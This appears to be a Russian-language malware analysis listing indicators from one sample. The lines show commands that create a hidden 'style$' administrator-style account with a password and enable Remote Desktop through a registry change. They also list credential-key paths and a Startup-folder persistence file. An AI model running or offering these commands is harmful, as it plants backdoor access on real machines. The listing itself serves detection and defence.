Техническая информация
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s style$ /add
- '<SYSTEM32>\DrvInst.exe' "1" "200" "UMB\UMB\1&841921d&0&TSBUS" "" "" "69f6e7ccb" "00000000" "00000550" "000003B4"
- '<SYSTEM32>\REG.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\net1.exe' user style$ www.hk##33.com /add
- <SYSTEM32>\Microsoft\Protect\S-1-5-20\0569b4d6-dfee-48d2-aeac-4cee33480646
- <SYSTEM32>\Microsoft\Protect\S-1-5-20\Preferred
- C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\f686aace6942fb7f7ceb231212eef4a4_97c09787-6498-4b10-8f65-9471d842c55e
- %WINDIR%\sdqlyk \EEEEEEEEEEEEEEEEEE
- %TEMP%\6e10b.tmp
- %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adb.url
- %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adb.url
- %TEMP%\6e10b.tmp